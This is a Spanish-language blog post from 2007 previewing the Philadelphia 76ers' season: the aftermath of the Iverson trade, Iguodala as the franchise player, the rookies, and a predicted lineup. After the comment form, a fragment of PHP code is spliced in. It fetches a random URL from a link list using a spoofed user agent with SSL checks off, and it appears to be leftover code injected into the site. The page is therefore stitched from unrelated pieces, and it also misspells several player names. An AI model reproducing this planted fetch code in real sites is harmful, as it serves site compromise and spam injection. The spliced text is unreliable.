Philadelphia 76ers: la botella medio llena

01 de October de 2007 por Jabho

En las últimas 4 temporadas sólo han conocido una de balance positivo, el año pasado traspasaron Iverson y a cambio no llegó ninguna megaestrella, cortaron a Webber, no aspiran al título pero están en terreno de impuesto de lujo… Y sin embargo, cosas de la vida, la botella parece medio llena.

Tras la llegada de Webber, mediada la temporada 04-05, parecía que los Sixers volvían a ser competitivos. Ese año no hubo Playoffs. La siguiente temporada, 05-06, Webber jugó 75 partidos con una media de 39 minutos y 20-10. Iverson hizo ese año una de sus mejores temporadas: 33 puntos y 7.5 asistencias. Esa temporada, a pesar de Webber e Iverson, el balance de los Sixers fue 38-44 y, por supuesto, fuera de Playoffs. ¿Qué fallaba en Philadelphia? Fuera o no por falta de química entre ambos, como se rumoreó, o porque dejó de creer en el proyecto, ‘The Answer’ pidió su salida del equipo. No salió al inicio de la temporada 06-07 pero sí durante ésta por la falta de resultados. Salió él, destino Denver, y salió Webber cortado. Los Sixers se quedaron huérfanos.

Durante una década Iverson, icono del equipo y de la liga, fue en todo momento la referencia del equipo. En estas 10 temporadas ha habido de todo: 6 años de Playoffs, una final de la NBA, un MVP, rookie del año, varios títulos de máximo anotador así como de líder de robos de balón, All-Stars , incluido en el quinteto ideal 3 temporadas… Números, tanto individuales como colectivos, que nos hablan de una estrella. Además, incluso por encima de estos datos, está su imagen, una de las más reconocibles de la liga, y que impulsó un cambio de etiqueta y estilo que muchos otros jugadores han seguido. Siempre en el ojo del huracán, para lo bueno y para lo malo, en un pabellón que ve retirados los números del Julius Erving, Wilt Chamberlain o Charles Barkley.

Pero a veces los ciclos se acaban y conviene un cambio de aires. Sólo así se entiende el arranque de la temporada pasada. Antes de traspasar a Iverson, Philadelphia acumulaba un balance de 5-18 y 11 partidos seguidos perdiendo. Tras dos años sin Playoffs y con el jugador pidiendo la salida no había otra solución que traspasarlo. Iverson fue a jugar al lado de Melo en Denver y a cambio Philadelphia recibió un sobrio y veterano base, Andre Miller, y dos primeras rondas para el draft de ese año.

Así que el exigente público de Philadelphia se vio a mitad de temporada con uno de los peores récords de la liga, su estrella cambiando de aires y Webber cortado. Como para hacerse ilusiones.

Sin embargo, y cuando menos se esparaba, el equipo reaccionó de la mano de un gran Iguodala y acabó la liga con 35-47, lo cual deja el balance sin Iverson en 30-29. Durante algunas fases de la liga incluso existió la posibilidad real de que el equipo alcanzara la postemporada. La salida de Iverson facilitó la brillante temporada de Iguodala (18-5,7-5,7), que se unió a la sobria e inteligente dirección de Miller, la solvencia de Dalembert bajo los aros y la aportación desde el banco de ‘raza blanca tirador’ Kover o Willie Green. Y lo que iba a ser un año perdido acabó con un cierto regusto a triunfo.

La temporada 07-08 arranca en Philadelphia con algunos nombres nuevos aunque similares expectativas. Músculo para el juego interior (Evans y Booth) y mucho talento joven para un equipo en el que lo más importante es justo eso, ver la progresión de los jóvenes. La noche del draft Philadelphia incorporó a Thaddeus Young, Jason Smith, Petteri Koponen, Derrick Byars y Herbert Hill.

Young es un alero de 19 años y sólo una temporada en la universidad. Salió en el pick 12 y posiblemente un año más en la NCAA le habría asegurado un puesto de lotería. Zurdo, muy atlético, buen tirador y con mucho talento, se puede esperar de él que se convierta en un All-Star. Eso sí, llega pronto a la liga y habrá que tener paciencia. Smih, pick 20, es un ala-pívot alto (2.13) y con buenos movientos. Debe mejorar en el aspecto físico y defensivo pero, viendo la falta de talento en el juego interior de los Sixers, debería de tener minutos desde el principio. Byars, escolta, puede aportar anotación desde el banco mientras que Koponen jugará un año más en Europa y será dificil que Hill entre en la rotación del equipo.

Así que en las manos de Maurice Cheeks estará manejar una joven plantilla sin objetivos deportivos a corto plazo, por lo que debe administrar minutos de juego para ir viendo la evolución de los recién llegados y de los que ya estaban. Seguirá contando con Andre Miller como un seguro de vida en el puesto de base. Green y Ollie darán descanso a Miller.

En los aleros Iguodala es fijo como titular. Jugador espectacular, muy atlético, completo y progresando año a año, es hoy por hoy el jugador franquicia de la plantilla. Si sigue progresando pronto será All-Star y por aquí empieza el futuro del equipo. Posiblemente le acompañe de titular Rodney Carney, jugador de segundo año de corte similar a Iguodala. Kover, especialista en el tiro, y el rookie Young saldrán desde el banco. Byars tendrá que aprovechar los pocos minutos que le queden.

Más problemas para el juego interior. En el puesto de ala-pívot Randolph, que se perdió media campaña por rotura de tibia y peroné, y los recien llegados Evans y el rookie Smith se repartirán los minutos. Cualquiera podría ser titular este año, pero a la larga el talento de Jason Smith deberia darle el puesto. Evans aportará mucho músculo, mucho rebote pero nada más. Randolph también rebotea con facilidad y puede aportar algo más ofensivamente que Evans. El pívot titular será Dalembert. Es un pívot solvente, buen defensor y buen rebotador aunque limitado en ataque. Booth y Henderson le darán descanso y de ninguno de ellos se puede esperar mucho.

Así que estamos ante una temporada de transición. Philadelphia debe crecer de la mano de sus jugadores más jovenes liderados por Iguodala. Además a final de temporada liberan los contratos de Webber (19 millones $) y Mckie (7 millones $), por lo que el verano que viene tendrán mucho margen de movimiento. Entonces será el momento de empezar a llenar la botella y, entre la progresión de los actuales jugadores y el talento que consigan incorporar, deberían aspirar a mayores objetivos.

Pero eso será el año que viene. Para este año seguiremos disfrutando del juego de un equipo que a buen seguro tendrá muchas jugadas entre los hightlights de la liga.

Probable quinteto: Andre Miller, Andre Iguodala, Rodney Carney, Shavilk Randolph y Samuel Dalembert
Sexto hombre: Kyle Kover

Pronóstico: Fuera de Playoffs

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>